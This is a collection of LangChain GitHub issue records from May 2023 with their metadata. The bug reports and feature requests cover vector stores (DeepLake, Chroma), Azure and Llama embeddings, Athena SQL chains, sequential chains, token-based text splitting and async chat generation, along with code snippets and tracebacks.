### System Info Langchain 0.0.168, Python 3.11.3 ### Who can help? @anihamde ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction db = DeepLake(dataset_path=f"hub://{username_activeloop}/{lake_name}", embedding_function=embeddings, overwrite=False) ### Expected behavior Would expect overwrite to not take place; however, it does. This is easily resolvable, and I'll share a PR to address this shortly.
Setting overwrite to False on DeepLake constructor still overwrites
https://api.github.com/repos/langchain-ai/langchain/issues/4682/comments
1
2023-05-14T19:15:22Z
2023-09-10T16:17:56Z
https://github.com/langchain-ai/langchain/issues/4682
1,709,045,521
4,682
[ "langchain-ai", "langchain" ]
### Feature request Hi team, I am a developer relations engineer working at Google on PaLM API. I want to participate and contribute to adding Google PaLM potentially to LangChain. How is our current dev stage of adding Google PaLM API? ### Motivation Better user experience with PaLM API :) ### Your contribution Still need discussion, might be PRs, design discussions, or others.
Add Google PaLM API
https://api.github.com/repos/langchain-ai/langchain/issues/4681/comments
20
2023-05-14T19:08:05Z
2024-01-30T00:52:41Z
https://github.com/langchain-ai/langchain/issues/4681
1,709,043,509
4,681
[ "langchain-ai", "langchain" ]
### Feature request LLM usually limits text by Tokens. It may be useful to split a large text into chunks according to the number of Tokens rather than the number of characters. For example, if LLM allows us to use 8000 tokens, and we want to split the text into chunks of up to 4000-tokens, then we can call ```python text_splitter = RecursiveCharacterTextSplitter(chunk_tokens = 4000, ... ``` ### Motivation If we split a text by number of characters, it is not obvious how many tokens these chunks will be. And at the same time if we want to split a text into bigger possible chunks and keep these chunks under certain LLM tokens limit, we cannot operate by number of characters. ### Your contribution As an example of the `RecursiveCharacterTextSplitter(chunk_tokens` implementation it is very useful libraries that helps to split text into tokens: https://github.com/openai/tiktoken ```python import tiktoken def split_large_text(large_text, max_tokens): enc = tiktoken.get_encoding("cl100k_base") tokenized_text = enc.encode(large_text) chunks = [] current_chunk = [] current_length = 0 for token in tokenized_text: current_chunk.append(token) current_length += 1 if current_length >= max_tokens: chunks.append(enc.decode(current_chunk).rstrip(' .,;')) current_chunk = [] current_length = 0 if current_chunk: chunks.append(enc.decode(current_chunk).rstrip(' .,;')) return chunks ```
Split by Tokens instead of characters: RecursiveCharacterTextSplitter
https://api.github.com/repos/langchain-ai/langchain/issues/4678/comments
35
2023-05-14T18:16:05Z
2024-06-21T16:37:58Z
https://github.com/langchain-ai/langchain/issues/4678
1,709,029,487
4,678
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I am using Chroma's client-server configuration and I have trouble setting up a retriever for ConversationalRetrievalChain.from_llm() function. I can't find anything related to this. Can someone guide me on how can I do that or if someone has any solution? For the locally stored database you cust called db.as_retriever() and that was it. But now, I can't find a solutionf or passing a retriever to from_llm() function. My code snippet is: ``` `def askQuestion(self, thread_id, question): collection = self.chroma_client.get_collection(name="my_collection5", embedding_function=self.embedding) self.llm = ChatOpenAI(model_name=self.model_name, temperature=self.temperature, openai_api_key=os.environ.get('OPENAI_API_KEY')) self.memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True, output_key='answer') self.chain = ConversationalRetrievalChain.from_llm(self.llm, collection.as_retriever(),return_source_documents=True,verbose=VERBOSE, memory=self.memory) result = self.chain({"question": question}) res_dict = { "answer": result["answer"], } res_dict["source_documents"] = [] # add source docs for source in result["source_documents"]: res_dict["source_documents"].append({ "page_content": source.page_content, "metadata": source.metadata }) return res_dict` ``` ### Suggestion: _No response_
Issue: Set up a Chroma retriever for client-server configuration of Chroma
https://api.github.com/repos/langchain-ai/langchain/issues/4676/comments
3
2023-05-14T18:08:39Z
2024-03-16T22:56:10Z
https://github.com/langchain-ai/langchain/issues/4676
1,709,027,393
4,676
[ "langchain-ai", "langchain" ]
### System Info ``` langchain==0.0.168 chromadb==0.3.22 ``` ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Clone official ChromaDB repository and run their docker-compose environment. ``` git clone git@github.com:chroma-core/chroma.git docker-compose up ``` Create a folder called `my_data` and create a `test.txt` file into it with some random text. ``` mkdir my_data cd my_data echo "testingtestingtesting" > test.txt ``` Script to reproduce issue: ``` from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain.embeddings.openai import OpenAIEmbeddings from langchain.vectorstores import Chroma from chromadb.config import Settings with open('my_data/test.txt', 'r', encoding="utf-8") as file: raw_text = file.read() text_splitter = RecursiveCharacterTextSplitter( chunk_size = 1000, chunk_overlap = 0, length_function = len, ) texts = text_splitter.split_text(raw_text) embeddings = OpenAIEmbeddings() client_settings = Settings( chroma_api_impl="rest", chroma_server_host="localhost", chroma_server_http_port="8000" ) collection_name = "chroma_test" vectorstore = Chroma.from_texts(embedding=embeddings, texts=texts, client_settings=client_settings, collection_name=collection_name) ``` Set necessary `OPENAI_API_KEY` environment variables and run the script. This will result in an error: `Exception: {"error":"InvalidUUID","message":"Could not parse chroma_test as a UUID"}` The same issue will not happen if you run ChromaDB locally like this. Only when calling the actual API you then run in to the issue. ``` vectorstore = Chroma.from_texts(embedding=embeddings, texts=texts, persist_directory="db") ``` ### Expected behavior The expected behaviour would be that Langchain would call the ChromaDB API correctly with the `UUID` instead of the plaintext name of the collection. See chromaDB sourcecode and their API `chromadb\server\fastapi\__init__.py` Line `105` ``` self.router.add_api_route( "/api/v1/collections/{collection_id}/add", self.add, methods=["POST"], status_code=status.HTTP_201_CREATED, ) ``` Line `196` ``` def add(self, collection_id: str, add: AddEmbedding) -> None: try: result = self._api._add( collection_id=_uuid(collection_id), embeddings=add.embeddings, metadatas=add.metadatas, documents=add.documents, ids=add.ids, increment_index=add.increment_index, ) except InvalidDimensionException as e: raise HTTPException(status_code=500, detail=str(e)) return result ``` Line `67` ``` def _uuid(uuid_str: str) -> UUID: try: return UUID(uuid_str) except ValueError: raise InvalidUUIDError(f"Could not parse {uuid_str} as a UUID") ```
langchain chroma vectorstore calls ChromaDB API incorrectly when ChromaDB is running in Docker
https://api.github.com/repos/langchain-ai/langchain/issues/4674/comments
6
2023-05-14T17:26:09Z
2023-10-31T16:07:20Z
https://github.com/langchain-ai/langchain/issues/4674
1,709,016,097
4,674
[ "langchain-ai", "langchain" ]
### System Info I'm trying to make use of the sequential chaining functionality by chaining together two prompts like so: ``` # importing frameworks and such import os from apikey import apikey import streamlit as st from langchain.llms import OpenAI from langchain.prompts import PromptTemplate from langchain.chains import LLMChain, SimpleSequentialChain os.environ["OPENAI_API_KEY"] = apikey # Defning and building out our OOTB app framework via Streamlit st.title("Medical GPT") prompt = st.text_input("Enter your prompt here") # Defining our prompt template illness_template = PromptTemplate( input_variables=["condition"], template="Summarise the common symptoms for {condition}" ) treatment_template = PromptTemplate( input_variables=["illness"], template="Summarise the treatment for this illness ILLNESS: {illness}" ) # Defining our LLM and chains llm = OpenAI(temperature=0.7) illness_chain = LLMChain(llm=llm, prompt=illness_template, verbose=True) treatment_chain = LLMChain(llm=llm, prompt=treatment_template, verbose=True) sequential_chain = SimpleSequentialChain(chains=[illness_chain, treatment_chain]) # Return prompt output to frontend when a prompt is given if prompt: response = sequential_chain.run(topic=prompt) st.write(response) ``` For some reason, it keeps throwing the error: ``` Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 565, in _run_script exec(code, module.__dict__) File "/Users/user/Langchain_hacking/app.py", line 43, in <module> response = sequential_chain.run(topic=prompt) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/chains/base.py", line 239, in run return self(kwargs, callbacks=callbacks)[self.output_keys[0]] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/chains/base.py", line 123, in __call__ inputs = self.prep_inputs(inputs) ^^^^^^^^^^^^^^^^^^^^^^^^ File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/chains/base.py", line 216, in prep_inputs self._validate_inputs(inputs) File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/chains/base.py", line 83, in _validate_inputs raise ValueError(f"Missing some input keys: {missing_keys}") ValueError: Missing some input keys: {'input'} ``` I'm not entirely sure why it keeps throwing up this error, as far as the documentation goes I'm calling `SimpleSequentialChain` correctly unless I'm missing something? ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` if prompt: response = sequential_chain.run(topic=prompt) st.write(response) ``` ### Expected behavior LLM output
ValueError: Missing some input keys: {'input'}
https://api.github.com/repos/langchain-ai/langchain/issues/4673/comments
3
2023-05-14T16:30:59Z
2023-08-08T20:08:15Z
https://github.com/langchain-ai/langchain/issues/4673
1,709,000,599
4,673
[ "langchain-ai", "langchain" ]
### System Info I tried to run this example: https://python.langchain.com/en/latest/use_cases/agent_simulations/characters.html But when I set the LLM with AzureChatOpenAI doesn't work. The error is: ``` Traceback (most recent call last): File "/home/adrian-ubuntu/projects/generative-agents/langchain_generative_agent.py", line 79, in <module> print(tommie.get_summary()) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/experimental/generative_agents/generative_agent.py", line 215, in get_summary self.summary = self._compute_agent_summary() File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/experimental/generative_agents/generative_agent.py", line 201, in _compute_agent_summary self.chain(prompt) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chains/base.py", line 239, in run return self(kwargs, callbacks=callbacks)[self.output_keys[0]] File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chains/base.py", line 140, in __call__ raise e File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chains/base.py", line 134, in __call__ self._call(inputs, run_manager=run_manager) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chains/llm.py", line 69, in _call response = self.generate([inputs], run_manager=run_manager) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chains/llm.py", line 79, in generate return self.llm.generate_prompt( File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/base.py", line 142, in generate_prompt return self.generate(prompt_messages, stop=stop, callbacks=callbacks) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/base.py", line 90, in generate raise e File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/base.py", line 82, in generate results = [ File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/base.py", line 83, in <listcomp> self._generate(m, stop=stop, run_manager=run_manager) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 293, in _generate response = self.completion_with_retry(messages=message_dicts, **params) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 254, in completion_with_retry return _completion_with_retry(**kwargs) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/tenacity/__init__.py", line 289, in wrapped_f return self(f, *args, **kw) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/tenacity/__init__.py", line 379, in __call__ do = self.iter(retry_state=retry_state) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/tenacity/__init__.py", line 314, in iter return fut.result() File "/usr/lib/python3.10/concurrent/futures/_base.py", line 451, in result return self.__get_result() File "/usr/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result raise self._exception File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/tenacity/__init__.py", line 382, in __call__ result = fn(*args, **kwargs) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 252, in _completion_with_retry return self.client.create(**kwargs) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/openai/api_resources/chat_completion.py", line 25, in create return super().create(*args, **kwargs) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/openai/api_resources/abstract/engine_api_resource.py", line 153, in create response, _, api_key = requestor.request( File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/openai/api_requestor.py", line 226, in request resp, got_stream = self._interpret_response(result, stream) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/openai/api_requestor.py", line 620, in _interpret_response self._interpret_response_line( File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/openai/api_requestor.py", line 683, in _interpret_response_line raise self.handle_error_response( openai.error.InvalidRequestError: Resource not found Process finished with exit code 1 ``` But with a simple example like: ``` model = AzureChatOpenAI(deployment_name="gpt-35-turbo", max_tokens=1500) print(model([HumanMessage(content="Translate this sentence from English to French. I love programming.")])) ``` works perfectly (and both runs are configured with same env variables) Version of langchain: 0.0.168 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` import logging from langchain.chat_models import AzureChatOpenAI from langchain.llms import AzureOpenAI logging.basicConfig(level=logging.ERROR) from datetime import datetime, timedelta from typing import List from termcolor import colored from langchain.docstore import InMemoryDocstore from langchain.embeddings import OpenAIEmbeddings from langchain.vectorstores import FAISS from langchain.retrievers import TimeWeightedVectorStoreRetriever from langchain.experimental.generative_agents import GenerativeAgent, GenerativeAgentMemory import math import faiss def relevance_score_fn(score: float) -> float: """Return a similarity score on a scale [0, 1].""" # This will differ depending on a few things: # - the distance / similarity metric used by the VectorStore # - the scale of your embeddings (OpenAI's are unit norm. Many others are not!) # This function converts the euclidean norm of normalized embeddings # (0 is most similar, sqrt(2) most dissimilar) # to a similarity function (0 to 1) return 1.0 - score / math.sqrt(2) def create_new_memory_retriever(): """Create a new vector store retriever unique to the agent.""" # Define your embedding model embeddings_model = OpenAIEmbeddings(deployment="text-embedding-ada-002_deploy", chunk_size=1) # Initialize the vectorstore as empty embedding_size = 1536 index = faiss.IndexFlatL2(embedding_size) vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {}, relevance_score_fn=relevance_score_fn) return TimeWeightedVectorStoreRetriever(vectorstore=vectorstore, other_score_keys=["importance"], k=15) USER_NAME = "Person A" # The name you want to use when interviewing the agent. LLM = AzureChatOpenAI(deployment_name="gpt-35-turbo", max_tokens=1500) tommies_memory = GenerativeAgentMemory( llm=LLM, memory_retriever=create_new_memory_retriever(), verbose=True, reflection_threshold=8 # we will give this a relatively low number to show how reflection works ) tommie = GenerativeAgent(name="Tommie", age=25, traits="anxious, likes design, talkative", # You can add more persistent traits here status="looking for a job", # When connected to a virtual world, we can have the characters update their status memory_retriever=create_new_memory_retriever(), llm=LLM, memory=tommies_memory ) # The current "Summary" of a character can't be made because the agent hasn't made # any observations yet. print(tommie.get_summary()) ``` ### Expected behavior Just working
Generative Agents don't work with AzureChatOpenAI
https://api.github.com/repos/langchain-ai/langchain/issues/4670/comments
1
2023-05-14T14:54:48Z
2023-09-10T16:18:00Z
https://github.com/langchain-ai/langchain/issues/4670
1,708,972,374
4,670
[ "langchain-ai", "langchain" ]
### Issue with current documentation: https://python.langchain.com/en/latest/modules/agents/agents/custom_agent.html ### Idea or request for content: I was going through the documentation for creating a custom agent (https://python.langchain.com/en/latest/modules/agents/agents/custom_agent.html) and noticed a potential typo. In the section discussing the components of a custom agent, the text mentions that an agent consists of "three parts" but only two are listed: "Tools" and "The agent class itself". I believe the text should say "two parts" instead of "three". Could you please confirm if this is a typo, or if there's a missing third part that needs to be included in the list?
DOC: Typo in Custom Agent Documentation
https://api.github.com/repos/langchain-ai/langchain/issues/4668/comments
0
2023-05-14T12:52:17Z
2023-05-18T04:02:24Z
https://github.com/langchain-ai/langchain/issues/4668
1,708,934,167
4,668
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. In ingest process, a long document was splitted into multiple documents and embedding into vector DB. In inference process, the top K trunks were returned as context feeding to LLM. In most of the cases this machanism works well, but what if I want to make an overall summary of the document? relying on the top K smilarity result won't be sufficient, or the query is relvevant to every trunks of document? How can I make langchain digest every piece of document before inference? ### Suggestion: _No response_
Is it possible to digest every piece of document befero inferece?
https://api.github.com/repos/langchain-ai/langchain/issues/4667/comments
3
2023-05-14T11:14:14Z
2023-09-12T16:15:15Z
https://github.com/langchain-ai/langchain/issues/4667
1,708,906,341
4,667
[ "langchain-ai", "langchain" ]
### Feature request Rewriting Langchain codebase and library with Mojo. https://www.modular.com/mojo ### Motivation Up to 35000x faster than Python for ML / DL applications. Utilize the full power of the hardware, including multiple cores, vector units, and exotic accelerator units, with the world's most advanced compiler and heterogenous runtime. Achieve performance on par with C++ and CUDA without the complexity. Mojo leverages MLIR, which enables Mojo developers to take advantage of vectors, threads, and AI hardware units. Experience true interoperability with the Python ecosystem. Seamlessly intermix arbitrary libraries like Numpy and Matplotlib and your custom code with Mojo. ### Your contribution Will start tackling the topic with a team myself if: 1. Operating my own DGX cluster or 2. enough other people get on board to get the project started.
Rewrite Langchain in Mojo
https://api.github.com/repos/langchain-ai/langchain/issues/4666/comments
4
2023-05-14T09:17:24Z
2023-12-14T16:08:38Z
https://github.com/langchain-ai/langchain/issues/4666
1,708,874,996
4,666
[ "langchain-ai", "langchain" ]
### System Info langchain>=0.0.123 sqlalchemy==1.4.48 PyAthena[SQLAlchemy]>=1.2.0,<2.0.0 Python 3.10.11 ### Who can help? @hwchase17, @eyurtsev, @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. create aws athena engine and connect to athena engine_athena=create_engine('awsathena+rest://<keys>/<keys>@athena.us-east-1.amazonaws.com:443/<db_name>?s3_staging_dir=<bucket name>/&work_group=primary') db = SQLDatabase(engine_athena) Connection is established successfully. 2. db_chain = SQLDatabaseChain.from_llm(llm, db, prompt=PROMPT, verbose=True, return_intermediate_steps=True) 3. db_chain(query) where query is 'how many claims are there?' ### Expected behavior Expected behavior - SQL should run against Athena Error - TypeError: __init__() got an unexpected keyword argument 'bind' It seems bind was deprecated from sqlalchemy version 2.0 onwards. However, PyAthena recommended SQLAlchemy version is <2.0.0. **How can this be resolved? here is detailed error message:** ``` SELECT count (policy_id_0) FROM claims ; SQLQuery: --------------------------------------------------------------------------- TypeError Traceback (most recent call last) Input In [25], in <cell line: 2>() 1 print(query) ----> 2 result = db_chain(sql) 3 result File ~\Anaconda3\lib\site-packages\langchain\chains\base.py:140, in Chain.__call__(self, inputs, return_only_outputs, callbacks) 138 except (KeyboardInterrupt, Exception) as e: 139 run_manager.on_chain_error(e) --> 140 raise e 141 run_manager.on_chain_end(outputs) 142 return self.prep_outputs(inputs, outputs, return_only_outputs) File ~\Anaconda3\lib\site-packages\langchain\chains\base.py:134, in Chain.__call__(self, inputs, return_only_outputs, callbacks) 128 run_manager = callback_manager.on_chain_start( 129 {"name": self.__class__.__name__}, 130 inputs, 131 ) 132 try: 133 outputs = ( --> 134 self._call(inputs, run_manager=run_manager) 135 if new_arg_supported 136 else self._call(inputs) 137 ) 138 except (KeyboardInterrupt, Exception) as e: 139 run_manager.on_chain_error(e) File ~\Anaconda3\lib\site-packages\langchain\chains\sql_database\base.py:96, in SQLDatabaseChain._call(self, inputs, run_manager) 94 # If not present, then defaults to None which is all tables. 95 table_names_to_use = inputs.get("table_names_to_use") ---> 96 table_info = self.database.get_table_info(table_names=table_names_to_use) 97 llm_inputs = { 98 "input": input_text, 99 "top_k": self.top_k, (...) 102 "stop": ["\nSQLResult:"], 103 } 104 intermediate_steps = [] File ~\Anaconda3\lib\site-packages\langchain\sql_database.py:167, in SQLDatabase.get_table_info(self, table_names) 164 continue 166 # add create table command --> 167 create_table = str(CreateTable(table).compile(self._engine)) 168 table_info = f"{create_table.rstrip()}" 169 has_extra_info = ( 170 self._indexes_in_table_info or self._sample_rows_in_table_info 171 ) File ~\Anaconda3\lib\site-packages\sqlalchemy\sql\elements.py:503, in ClauseElement.compile(self, bind, dialect, **kw) 498 url = util.preloaded.engine_url 499 dialect = url.URL.create( 500 self.stringify_dialect 501 ).get_dialect()() --> 503 return self._compiler(dialect, **kw) File ~\Anaconda3\lib\site-packages\sqlalchemy\sql\ddl.py:32, in _DDLCompiles._compiler(self, dialect, **kw) 28 def _compiler(self, dialect, **kw): 29 """Return a compiler appropriate for this ClauseElement, given a 30 Dialect.""" ---> 32 return dialect.ddl_compiler(dialect, self, **kw) File ~\Anaconda3\lib\site-packages\pyathena\sqlalchemy_athena.py:178, in AthenaDDLCompiler.__init__(self, dialect, statement, bind, schema_translate_map, compile_kwargs) 169 def __init__( 170 self, 171 dialect, (...) 175 compile_kwargs=util.immutabledict(), 176 ): 177 self._preparer = AthenaDDLIdentifierPreparer(dialect) --> 178 super(AthenaDDLCompiler, self).__init__( 179 dialect=dialect, 180 statement=statement, 181 bind=bind, 182 schema_translate_map=schema_translate_map, 183 compile_kwargs=compile_kwargs, 184 ) TypeError: __init__() got an unexpected keyword argument 'bind' ```
error while calling SQLDatabaseChain on AWS Athena
https://api.github.com/repos/langchain-ai/langchain/issues/4664/comments
1
2023-05-14T08:21:50Z
2023-05-18T04:24:46Z
https://github.com/langchain-ai/langchain/issues/4664
1,708,859,989
4,664
[ "langchain-ai", "langchain" ]
### System Info Runs under jupyterlab in docker platform : Linux-5.4.72-microsoft-standard-WSL2-x86_64-with-glibc2.29 python : 3.8.5 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction When trying to use a Llama model on local documents I have the following very basic piece of code : ```from langchain.llms import GPT4All from langchain.document_loaders import DirectoryLoader loader = DirectoryLoader('./', glob="**/*.yml", show_progress=True) local_model_path = './models/ggml-gpt4all-l13b-snoozy.bin' from langchain.embeddings import LlamaCppEmbeddings llama = LlamaCppEmbeddings(model_path=local_model_path) from langchain.indexes import VectorstoreIndexCreator index = VectorstoreIndexCreator(embeddings=llama).from_loaders([loader]) index.query("what are the CORE variables ?") ``` No specific requirement of any OpenAI tool, but I have the error below : ``` AVX = 1 | AVX2 = 1 | AVX512 = 0 | AVX512_VBMI = 0 | AVX512_VNNI = 0 | FMA = 1 | NEON = 0 | ARM_FMA = 0 | F16C = 1 | FP16_VA = 0 | WASM_SIMD = 0 | BLAS = 0 | SSE3 = 1 | VSX = 0 | --------------------------------------------------------------------------- ValidationError Traceback (most recent call last) <ipython-input-12-26dba7aded6b> in <module> 3 4 from langchain.indexes import VectorstoreIndexCreator ----> 5 index = VectorstoreIndexCreator(embeddings=llama).from_loaders([loader]) 6 index.query("what is the LHYFE variables ?") /usr/local/lib/python3.8/dist-packages/pydantic/main.cpython-38-x86_64-linux-gnu.so in pydantic.main.BaseModel.__init__() /usr/local/lib/python3.8/dist-packages/pydantic/main.cpython-38-x86_64-linux-gnu.so in pydantic.main.validate_model() /usr/local/lib/python3.8/dist-packages/pydantic/fields.cpython-38-x86_64-linux-gnu.so in pydantic.fields.ModelField.get_default() /usr/local/lib/python3.8/dist-packages/pydantic/main.cpython-38-x86_64-linux-gnu.so in pydantic.main.BaseModel.__init__() ValidationError: 1 validation error for OpenAIEmbeddings __root__ Did not find openai_api_key, please add an environment variable `OPENAI_API_KEY` which contains it, or pass 'openai_api_key' as a named parameter. (type=value_error) ​``` ``` Is there any specific configuration I missed out ? Many thanks for your kind help. ### Expected behavior I would have expected it to use the model stated in the code without any need for an OpenAI account.
Using LLama Embedings still rely on OpenAI key
https://api.github.com/repos/langchain-ai/langchain/issues/4661/comments
7
2023-05-14T07:04:36Z
2023-12-26T16:07:56Z
https://github.com/langchain-ai/langchain/issues/4661
1,708,841,518
4,661
[ "langchain-ai", "langchain" ]
### System Info error: ``` Traceback (most recent call last): File "/Users/delip/workspace/tmp/main3.py", line 38, in <module> asyncio.run(main()) File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/asyncio/runners.py", line 44, in run return loop.run_until_complete(main) File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/asyncio/base_events.py", line 616, in run_until_complete return future.result() File "/Users/delip/workspace/tmp/main3.py", line 32, in main await generate_concurrently() File "/Users/delip/workspace/tmp/main3.py", line 27, in generate_concurrently await asyncio.gather(*tasks) File "/Users/delip/workspace/tmp/main3.py", line 11, in async_generate resp = await llm.agenerate( File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/base.py", line 128, in agenerate raise e File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/base.py", line 118, in agenerate results = await asyncio.gather( File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/openai.py", line 322, in _agenerate message_dicts, params = self._create_message_dicts(messages, stop) File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/openai.py", line 304, in _create_message_dicts message_dicts = [_convert_message_to_dict(m) for m in messages] File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/openai.py", line 304, in <listcomp> message_dicts = [_convert_message_to_dict(m) for m in messages] File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/openai.py", line 92, in _convert_message_to_dict raise ValueError(f"Got unknown type {message}") ValueError: Got unknown type ('content', 'you are a helpful bot') ``` langchain version ``` conda env export | grep langchain - langchain==0.0.168 ``` ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [X] Async ### Reproduction minimum viable code to reproduce: ```python import time import asyncio from langchain.chat_models import ChatOpenAI from langchain.schema import HumanMessage, SystemMessage from keys import KEYS async def async_generate(llm): resp = await llm.agenerate( [ SystemMessage(content="you are a helpful bot"), HumanMessage(content="Hello, how are you?"), ] ) print(resp) async def generate_concurrently(): llm = ChatOpenAI( temperature=0.9, openai_api_key=KEYS["openai.api_key"], openai_organization=KEYS["openai.organization"], ) tasks = [async_generate(llm) for _ in range(3)] await asyncio.gather(*tasks) async def main(): start = time.perf_counter() await generate_concurrently() elapsed = time.perf_counter() - start print("\033[1m" + f"Concurrent executed in {elapsed:0.2f} seconds." + "\033[0m") if __name__ == "__main__": asyncio.run(main()) ``` ### Expected behavior Should produce 3 generation results.
ChatOpenAI.agenerate seems broken in 0.0.168?
https://api.github.com/repos/langchain-ai/langchain/issues/4643/comments
4
2023-05-14T00:55:12Z
2023-09-25T10:13:04Z
https://github.com/langchain-ai/langchain/issues/4643
1,708,780,067
4,643
[ "langchain-ai", "langchain" ]
